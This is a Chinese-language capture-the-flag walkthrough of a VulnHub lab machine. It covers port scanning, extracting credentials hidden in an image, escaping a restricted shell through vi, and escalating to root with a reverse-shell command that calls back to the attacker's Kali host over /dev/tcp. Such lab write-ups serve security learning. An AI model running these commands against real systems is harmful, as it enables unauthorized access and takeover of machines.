vulnhub 之Website By Unknowndevice64

vulnhub 之Website By Unknowndevice64



测试环境

攻击IP 说明 靶机IP
172.17.135.79 pc 172.17.135.64
172.17.135.75 VM-kali 172.17.135.64

测试前准备

搭好环境就直接访问80端口了,连接都没连接上,之后上kali,使用nmap扫描全部端口
使用命令:

nmap -T4 -A -sS -p 1-65535 -v 172.17.135.64

查询到端口如下:

image.png-19.4kB

端口 状态 服务
31337/tcp open http
1337/tcp open ssh

根据nmap扫描可以很清楚的看到两个可疑的端口,对两个端口进行具体的分析


31337端口

首先访问:
http://172.17.135.64:31337

image.png-162kB

查看源码

image.png-20.9kB

发现可以目录:key_is_h1dd3n.jpg

访问页面得到图片

image.png-36.5kB

根据目前获得的提示猜测该图片应为隐写图片,使用工具steghide进行查看,猜测图片隐写的密码为主页显示的h1dd3n

steghide extract -sf key_is_h1dd3n.jpg -p h1dd3n

image.png-8.4kB

查看h1dd3n.txt获取到一串编码

image.png-2.7kB

可以看出为brainfuck编码,使用在线网站对改编码进行解码,获得:

image.png-24.9kB

ud64:1M!#64@ud

尝试用获取到的用户名和密码进行ssh连接


1337端口

使用ssh进行连接

image.png-16kB

进行简单的查看目录时,发现大部分的常用命令都无法使用

image.png-12.4kB

所以下一步我们的思路是逃逸出去这种情形,在测试中我们发现vi命令我们可以使用,不过写入/bin/bash失败,并且sudo命令无法使用,所以我们使用!/bin/bash进入bash

image.png-3.9kB

在vi命令行下输入!/bin/bash即可顺利进入bash

image.png-11.7kB

我们通过export命令修改环境变量,从而让我们可以轻松的使用命令

bash-4.4$ export SHELL="/bin/bash"
bash-4.4$ export PATH="/usr/bin"

image.png-12.1kB

虽然此时可以使用sudo命令但是此时切换用户仍然需要使用密码

image.png-10.4kB

所以我们使用反弹shell的方法进行提权

首先kali虚拟机监听4444端口

nc -lvp 4444

image.png-2.4kB

使用命令:

sudo sysud64 -uroot /bin/bash -c "/bin/sh -i >& /dev/tcp/172.17.135.75/4444 0>&1"

image.png-73.6kB

image.png-11.5kB

顺利提到root权限

获取flag

image.png-266.6kB

发表评论

电子邮件地址不会被公开。 必填项已用*标注